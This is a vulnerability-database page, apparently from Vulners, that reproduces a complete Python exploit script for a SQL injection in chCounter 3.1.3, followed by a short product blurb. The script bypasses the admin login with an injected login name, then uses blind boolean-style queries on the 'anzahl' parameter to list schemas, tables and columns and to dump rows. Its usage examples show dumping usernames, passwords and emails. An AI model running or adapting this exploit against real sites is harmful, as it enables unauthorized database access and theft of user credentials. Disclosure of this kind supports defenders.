Vulners
Lucene search
chCounter 3.1.3 - SQL Injection
#!/usr/bin/python
#
# Exploit Title: chCounter <= 3.1.3 SQLInjection
# Date: 2010/11/18
# Author: Matias Fontanini([email protected]).
# Software Link: http://chcounter.org/chCounter3/getfile.php?id=5
# Version: 3.1.3
# Tested on: Ubuntu Server 10.04 with apache
#
# Requirements:
# - Downloads must be enabled(this is not default).
# - magic_quotes off.
# - Access to administration site(can be bypassed if magic_quotes off)
#
# =SQLInjection=
# Location: administration/index.php?cat=downloads&edit=
# Affected parameters: anzahl
# Method: POST
# Severity: High
# Description: When accessing administration/index.php?cat=downloads&edit=VALID_ID
# and using a valid download id, an attacker is able to manipulate the "anzahl"
# parameter to perform queries which only involve returning an integer. The query
# output will be sent back to the client in the "anzahl" text input.
# Exploit: An attacker could perform repeated crafted requests to retrieve any
# database records for which the user has access.
import sys
import httplib, urllib
import types
lookupString='name="anzahl" value="'
def generateHeaders(host, sessid):
headers = {'Host':host,
'User-Agent':'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':'en-us,en;q=0.5',
'Accept-Encoding':'deflate',
'Accept-Charset:':'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive':'115',
'Connection':'keep-alive',
'Content-Type':'application/x-www-form-urlencoded',
'Referer':'http://' + host,
'Cookie':'PHPSESSID='+sessid}
if sessid == '':
del headers['Cookie']
return headers
def loginRequest(connection, sessid, host, path):
headers = generateHeaders(host, sessid)
params = urllib.urlencode({'login_form':'1','login_name':'or \'=\'','login_pw':''})
connection.request('POST', path + 'administration/index.php', params, headers)
return connection.getresponse()
def generateSessId(connection, host, path):
headers = generateHeaders(host, '')
connection.request('GET', path + 'stats/online_users.php', '', headers)
response = connection.getresponse()
cookie = response.getheader('Set-Cookie')
if type(cookie) is types.NoneType:
print '[-] Could not get session id. Wrong path?'
exit(2)
return cookie[10:cookie.find(';')]
def genSessid(host, path):
print '[+] Trying ' + host + path
con = connectToHost(host)
sessid = generateSessId(con, host, path)
print '[+] Acquired PHPSESSID -> ' + sessid
con = connectToHost(sys.argv[1])
output = loginRequest(con, sessid, host, path).read()
if output.find('login_name') != -1:
print '[-] Could not bypass login'
exit(7)
return sessid
def guessLen(sessid, host, field, path, dId, table):
headers = generateHeaders(host, sessid)
connection = connectToHost(host)
params = urllib.urlencode({'dl_id':dId,
'name':'test','url':'http://test.com',
'wert':'test',
'timestamp_eintrag':'2010-11-17, 15:43:00',
'timestamp':'2010-11-17, 15:43:00',
'edit_download':'Save entry',
'anzahl':'(select length(val) from (select '+field+' as val from '+table+') as xYsdS)'})
connection.request('POST', path + 'administration/index.php?cat=downloads&edit='+str(dId), params, headers)
response = connection.getresponse().read()
if response.find('command denied') != -1:
print '[-] Could not acces table. Acces denied.'
exit(4)
index = response.find(lookupString)
return int(str(response[index+len(lookupString):response.find('"', index+len(lookupString))]))
def guessField(sessid, host, path, dId, field, table):
sz=guessLen(sessid, host, field, path, dId, table)
headers = generateHeaders(host, sessid)
i=1
while i <= sz:
connection = connectToHost(host)
params = urllib.urlencode({'dl_id':dId,
'name':'test','url':'http://test.com',
'wert':'test',
'timestamp_eintrag':'2010-11-17, 15:43:00',
'timestamp':'2010-11-17, 15:43:00',
'edit_download':'Save entry',
'anzahl':'(select ascii(substring(val,'+str(i)+',1)) from (select '+field+' as val from '+table+') as x)'})
connection.request('POST', path + 'administration/index.php?cat=downloads&edit='+str(dId), params, headers)
response = connection.getresponse().read()
index = response.find(lookupString)
sys.stdout.write(chr(int(str(response[index+len(lookupString):response.find('"', index+len(lookupString))]))))
sys.stdout.flush()
i += 1
def getValidId(sessid, host, path):
headers = generateHeaders(host, sessid)
connection = connectToHost(host)
connection.request('GET', path + 'administration/index.php?cat=downloads', '', headers)
response = connection.getresponse().read()
if response.find('ID') == -1:
print '[-] Downloads seem to be deactivated'
exit(6)
index=response.find('index.php?cat=downloads&edit=')
return int(str(response[index+len('index.php?cat=downloads&edit='):response.find('"', index+len('index.php?cat=downloads&edit='))]))
def getRowCount(sessid, host, path, dId, field, table):
headers = generateHeaders(host, sessid)
connection = connectToHost(host)
params = urllib.urlencode({'dl_id':dId,
'name':'test','url':'http://test.com',
'wert':'test',
'timestamp_eintrag':'2010-11-17, 15:43:00',
'timestamp':'2010-11-17, 15:43:00',
'edit_download':'Save entry',
'anzahl':'(select count(distinct('+field+')) from '+table+')'})
connection.request('POST', path + 'administration/index.php?cat=downloads&edit='+str(dId), params, headers)
response = connection.getresponse().read()
if response.find('command denied') != -1:
print '[-] Could not acces table. Acces denied.'
exit(4)
index = response.find(lookupString)
return int(str(response[index+len(lookupString):response.find('"', index+len(lookupString))]))
def getSchemas(sessid, host, path, dId):
rows=getRowCount(sessid, host, path, dId,'schema_name', 'information_schema.schemata')
print '[+] Schema count: ' + str(rows)
for i in range(0, rows):
sys.stdout.write('[+] Table name: ')
guessField(sessid, host, path, dId,'schema_name', 'information_schema.schemata limit 1 offset '+str(i))
print ''
def getTables(sessid, host, path, dId):
rows=getRowCount(sessid, host, path, dId,'table_name', 'information_schema.tables')
print '[+] Table count: ' + str(rows)
for i in range(0, rows):
sys.stdout.write('[+] Table name: ')
guessField(sessid, host, path, dId,'table_name', 'information_schema.tables limit 1 offset '+str(i))
print ''
def getColumns(sessid, host, path, dId, table):
rows=getRowCount(sessid, host, path, dId,'column_name', 'information_schema.columns where table_name = \'' + table + '\'')
print '[+] Column count: ' + str(rows)
for i in range(0, rows):
sys.stdout.write('[+] Column name: ')
guessField(sessid, host, path, dId,'column_name', 'information_schema.columns where table_name = \'' + table + '\' limit 1 offset '+str(i))
print ''
def getItems(sessid, host, path, dId, table, columns, orderby):
rows=getRowCount(sessid, host, path, dId, columns[0], table)
print '[+] Item count: ' + str(rows)
print '[+] Dump:'
for i in range(0, rows):
for col in columns:
if len(orderby):
sys.stdout.write(' || ')
guessField(sessid, host, path, dId, col, table+' order by ' + orderby + ' limit 1 offset '+str(i))
else:
sys.stdout.write(' || ')
guessField(sessid, host, path, dId, col, table+' limit 1 offset '+str(i))
print ' || '
def connectToHost(host):
con = httplib.HTTPConnection(sys.argv[1], 80)
tries=5
recon=True
while tries > 0 and recon == True:
try:
con.connect();
recon = False
except:
tries -= 1
if tries == 0:
print '[-] Could not establish connection'
exit(3)
return con
def printHelp():
print '[-] Usage ' + sys.argv[0] + ' <WEBSERVER> <PATH_TO_CHCOUNTER> <OPTION> [ARGS]'
print ' OPTION can be:'
print ' -t to list all tables'
print ' -c <TABLE> to list all columns from table TABLE'
print ' -s <TABLE> to list all columns from table TABLE'
print ' -i <TABLE> <COLUMNS*> [ORDERBY] to list TABLE:COLUMN items.'
print ' COLUMNS* can be a comma-separated list of columns'
print ''
print ' Examples:'
print ' ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -t'
print ' ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -s'
print ' ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -c users'
print ' ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -i users username,passwd,email'
print ' ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -i users username user_id'
print ' The last example outputs result ordered by user_id'
exit(1)
if len(sys.argv) < 4:
printHelp()
sessid = genSessid(sys.argv[1], sys.argv[2])
valId = getValidId(sessid, sys.argv[1], sys.argv[2])
if sys.argv[3] == '-t':
getTables(sessid, sys.argv[1], sys.argv[2], valId)
exit(0)
if sys.argv[3] == '-c':
if len(sys.argv) < 5:
printHelp()
getColumns(sessid, sys.argv[1], sys.argv[2], valId, sys.argv[4])
exit(0)
if sys.argv[3] == '-i':
if len(sys.argv) < 6:
printHelp()
orderby=''
if len(sys.argv) == 7:
orderby = sys.argv[6]
orderby = sys.argv[6]
getItems(sessid, sys.argv[1], sys.argv[2], valId, sys.argv[4], sys.argv[5].split(','), orderby)
exit(0)
if sys.argv[3] == '-s':
if len(sys.argv) < 4:
printHelp()
getSchemas(sessid, sys.argv[1], sys.argv[2], valId)
exit(0)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Nov 2010 00:00Current
7.4High risk
Vulners AI Score7.4